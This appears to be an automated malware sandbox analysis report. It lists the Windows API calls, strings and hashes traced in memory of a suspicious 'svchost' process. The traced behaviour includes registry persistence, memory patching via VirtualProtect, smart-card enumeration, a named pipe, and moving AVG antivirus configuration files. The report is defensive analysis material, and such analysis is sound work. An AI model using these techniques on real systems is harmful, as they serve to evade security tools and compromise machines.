                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                              • String ID: 5dd2beaba$software\microsoft
                                                                                                                                                                                                              • API String ID: 287100044-3143834697
                                                                                                                                                                                                              • Opcode ID: a4ee62259bbb09a756004b63df9f38a92f8cc71f9b4994934be1f519763daf4e
                                                                                                                                                                                                              • Instruction ID: 81fdc1bcb626beed162fd3fab8ddd0dfe9c29b686c964865a0d8ac25b74f98f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4ee62259bbb09a756004b63df9f38a92f8cc71f9b4994934be1f519763daf4e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1F06275982218FBE700EBA0DD49FAE7B7CEB04742F904654FA02E6180D6716A108BE0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02CB5A7F
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02CB5AB8
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB5B23
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB5B86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _snprintf$DirectoryInformationSystemVolumeWindows
                                                                                                                                                                                                              • String ID: 1234567890QWERTYUIOPASDFGHJKLZXCVBNM$5DD2BE37a$A23C419D
                                                                                                                                                                                                              • API String ID: 2823094833-986658936
                                                                                                                                                                                                              • Opcode ID: 0a9b43516b0c8804496d153133795425025a9deb5ea9d89ef1ff770cf5260127
                                                                                                                                                                                                              • Instruction ID: 6e584532139d2b7aafd2bb49cd03dc416d7c9524ff283a68d03bcd546193c4ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a9b43516b0c8804496d153133795425025a9deb5ea9d89ef1ff770cf5260127
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B5415CB1A00219ABDB11CF68CD84BEEF7FAEF94340F9541A4D649EB280D7B15B098780
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA5B18
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(02CA6C37,5dd2b9dea,00000000,?,00000000,?), ref: 02CA5B5A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(02CA6C37), ref: 02CA5B64
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(-80000001), ref: 02CA5B2A
                                                                                                                                                                                                                • Part of subcall function 02C93420: IsUserAnAdmin.SHELL32 ref: 02C93428
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,02CA5B76), ref: 02C9345F
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegQueryValueExA.ADVAPI32(02CA5B76,5dd2bf39a,00000000,?,00000000,?), ref: 02C9347C
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegCloseKey.ADVAPI32(02CA5B76), ref: 02C93486
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegOpenKeyExA.KERNEL32(80000002,software\microsoft,00000000,00000101,?), ref: 02C934B9
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegQueryValueExA.KERNEL32(?,5dd2bf39a,00000000,?,00000000,?), ref: 02C934D6
                                                                                                                                                                                                                • Part of subcall function 02C93420: RegCloseKey.ADVAPI32(?), ref: 02C934E0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseOpenQueryValue$AdminUser
                                                                                                                                                                                                              • String ID: 5DD2B667a$5dd2b9dea$software\microsoft
                                                                                                                                                                                                              • API String ID: 2113243795-3349802430
                                                                                                                                                                                                              • Opcode ID: ff2793cf673d2edf79b47908a1912db4f633a469a1da6ee894da3984d1500278
                                                                                                                                                                                                              • Instruction ID: 6b56ff3aa1ebf7b380f7045394044e923f83723fd4ca6b7068758828cdbcb33e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff2793cf673d2edf79b47908a1912db4f633a469a1da6ee894da3984d1500278
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 970192B5E9120AABEF00DBF4DC45BAEB7B8AB04645F804658F515E7280E7749A008B90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,74DEF550,00000000,75BFBD50,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA578
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CAA5A0
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(00000000,?,00000040,02CA98DA,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA635
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,00000040,02CA98DA,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA64A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,02CA98DA,?,?,?,00000000,00000000,?,?,?,?,?,?,02CA98DA,00000000), ref: 02CAA67A
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000000,02CA98DA,?,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA686
                                                                                                                                                                                                                • Part of subcall function 02CAA6B0: WaitForSingleObject.KERNEL32(?,000003E8,00000000,02CAA693,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA6BC
                                                                                                                                                                                                                • Part of subcall function 02CAA6B0: GetProcessHeap.KERNEL32(00000008,00000030,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA6C6
                                                                                                                                                                                                                • Part of subcall function 02CAA6B0: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA6CD
                                                                                                                                                                                                                • Part of subcall function 02CAA6B0: memset.MSVCRT ref: 02CAA6DE
                                                                                                                                                                                                                • Part of subcall function 02CAA6B0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA72A
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,74DEF550,00000000,75BFBD50,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA697
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,?,?,?,02CA98DA,00000000,02CA9730,02CEA04C), ref: 02CAA69E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$Protect$AllocHeapProcess$CacheCurrentFlushInstructionMutexObjectReleaseSingleWaitmemcpymemset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2609073853-0
                                                                                                                                                                                                              • Opcode ID: 9f374aeccda4d00e945f1299877f00db1003c17fe1813348f2ca37fe2434aac9
                                                                                                                                                                                                              • Instruction ID: d9c1ff16e4d02cd48b988443a92d2596caba60bc44a2ca9d2847925569e6a009
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f374aeccda4d00e945f1299877f00db1003c17fe1813348f2ca37fe2434aac9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45413C76A00617ABCB109EBC8C94FBE7B7AEF80358F44462CE54597384D635DA01CBA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                              • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                              • API String ID: 3225117150-898603304
                                                                                                                                                                                                              • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8), ref: 02CAA7CB
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000018,00000040,?), ref: 02CAA818
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 02CAA847
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000), ref: 02CAA84E
                                                                                                                                                                                                              • VirtualProtect.KERNEL32(?,00000018,?,?), ref: 02CAA862
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(?), ref: 02CAA879
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CAA881
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProtectVirtual$CacheCurrentFlushInstructionMutexObjectProcessReleaseSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 842647815-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SCardEstablishContext.WINSCARD(00000002,00000000,00000000,02CA6A83,00000000), ref: 02CB5875
                                                                                                                                                                                                              • SCardListReadersA.WINSCARD(02CA6A83,00000000,?,FFFFFFFF), ref: 02CB588C
                                                                                                                                                                                                              • SCardConnectA.WINSCARD(02CA6A83,?,00000002,00000003,?,?), ref: 02CB58BE
                                                                                                                                                                                                              • SCardDisconnect.WINSCARD(?,00000000), ref: 02CB58E9
                                                                                                                                                                                                              • SCardFreeMemory.WINSCARD(02CA6A83,?), ref: 02CB5905
                                                                                                                                                                                                              • SCardReleaseContext.WINSCARD(02CA6A83), ref: 02CB5913
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Card$Context$ConnectDisconnectEstablishFreeListMemoryReadersRelease
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3231658416-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02C96E00
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: IsNetworkAlive.SENSAPI(02C96E0D,00000000), ref: 02CA4F93
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: IsUserAnAdmin.SHELL32 ref: 02CA4FA1
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: DnsFlushResolverCache.DNSAPI ref: 02CA4FAB
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: memset.MSVCRT ref: 02CA4FC8
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02CA4FE7
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02CA5000
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5013
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: memset.MSVCRT ref: 02CA502C
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02CA5045
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02CA5058
                                                                                                                                                                                                                • Part of subcall function 02CA4F80: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5065
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,00000000,00000000), ref: 02C96E1C
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00006A90,00000000,00000000,00000000), ref: 02C96E78
                                                                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF,74DF0F10,?,00000000,00000000), ref: 02C96EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02C96EB8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$CheckConnectionInternetlstrcpyn$AdminAliveCacheCloseCreateFlushHandleMultipleNetworkObjectsResolverSleepThreadUserWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2160739018-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 02CA80CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02CA8108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02CA8123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02CA812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02CA8151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathFindFileNameA.SHLWAPI(?), ref: 02CA80CA
                                                                                                                                                                                                              • FindFirstChangeNotificationA.KERNEL32(?,00000000,0000010D,?,?,00000000), ref: 02CA8108
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000), ref: 02CA8123
                                                                                                                                                                                                              • FindNextChangeNotification.KERNEL32(00000000,?,?,00000000), ref: 02CA812A
                                                                                                                                                                                                              • Sleep.KERNEL32(00000BB8,?,?,00000000), ref: 02CA8151
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Find$ChangeNotification$FileFirstNameNextObjectPathSingleSleepWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 433761119-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02C96AB4
                                                                                                                                                                                                                • Part of subcall function 02C96980: memset.MSVCRT ref: 02C969A2
                                                                                                                                                                                                                • Part of subcall function 02C96980: memset.MSVCRT ref: 02C969C0
                                                                                                                                                                                                                • Part of subcall function 02C96980: lstrcpynA.KERNEL32(?,?,00000104), ref: 02C969DD
                                                                                                                                                                                                                • Part of subcall function 02C96980: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02C96A4D
                                                                                                                                                                                                                • Part of subcall function 02C96980: RegSetValueExA.ADVAPI32(?,5DD2BAAFa,00000000,00000001,?,00000104), ref: 02C96A6F
                                                                                                                                                                                                                • Part of subcall function 02C96980: RegCloseKey.ADVAPI32(?), ref: 02C96A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02C96AE4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02C96AE7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02C96AF4
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 02C96AF7
                                                                                                                                                                                                                • Part of subcall function 02C96690: memset.MSVCRT ref: 02C966B0
                                                                                                                                                                                                                • Part of subcall function 02C96690: calloc.MSVCRT ref: 02C9670F
                                                                                                                                                                                                                • Part of subcall function 02C96690: exit.MSVCRT ref: 02C9671F
                                                                                                                                                                                                                • Part of subcall function 02C96690: calloc.MSVCRT ref: 02C96729
                                                                                                                                                                                                                • Part of subcall function 02C96690: exit.MSVCRT ref: 02C96734
                                                                                                                                                                                                                • Part of subcall function 02C96690: calloc.MSVCRT ref: 02C9674F
                                                                                                                                                                                                                • Part of subcall function 02C96690: exit.MSVCRT ref: 02C9675C
                                                                                                                                                                                                                • Part of subcall function 02C96690: calloc.MSVCRT ref: 02C96766
                                                                                                                                                                                                                • Part of subcall function 02C96690: exit.MSVCRT ref: 02C96771
                                                                                                                                                                                                                • Part of subcall function 02C96690: calloc.MSVCRT ref: 02C96794
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: calloc$Heapexit$memset$Process$AdminCloseFreeOpenUserValidateValuelstrcpyn
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1728208919-0
                                                                                                                                                                                                              • Opcode ID: da0a683705e017697dafbfa1902021094027ad29feaaccc299bfa8d9c8b489ce
                                                                                                                                                                                                              • Instruction ID: 3800625931f25ecdbaeb3ad372cd3e2f57fd2879adc29917c4ac6e11c3faecf9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: da0a683705e017697dafbfa1902021094027ad29feaaccc299bfa8d9c8b489ce
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 34F0C8729C2215A7CE207AA1E80CB9B765CEBC0792F548515F605D7180CBB5D060C6F0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                              • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFolderMovePath
                                                                                                                                                                                                              • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                              • API String ID: 1404575960-1083204512
                                                                                                                                                                                                              • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,76ECFFB0,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49AD
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,02CA7967,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49CA
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,02CA7967,00000000,?,00000000), ref: 02CB49E2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,02CA7967,00000000), ref: 02CB49F3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess$CloseInformationOpenTimes
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3228293703-0
                                                                                                                                                                                                              • Opcode ID: c7f254cdee3376b772cf3f54225ce1d401f00077be12c7d5e0a56f6b714a289b
                                                                                                                                                                                                              • Instruction ID: ca3e15548ec4f4aaa993eeada8c499cd99cf4c0d3223c259fc8019a643b24b22
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c7f254cdee3376b772cf3f54225ce1d401f00077be12c7d5e0a56f6b714a289b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF111CB2D01219ABCB159F9AC8849EFFBFCFF98244F50814AE905E7101D770AA45CBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CA6CA0,00000000,00000000,00000000), ref: 02CA77D4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA77EC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA77FD
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 02CA7805
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleThread$CloseCreateExitInformation
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4233414108-0
                                                                                                                                                                                                              • Opcode ID: 21d21a51202f1c55e417e20eacf72d84b3f3f171f918724bd02f271d3c9ec737
                                                                                                                                                                                                              • Instruction ID: 1d5c8aaead2b60c1a93907ae8cc9c60176eb71ae99dde19cea43576f24f876d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 21d21a51202f1c55e417e20eacf72d84b3f3f171f918724bd02f271d3c9ec737
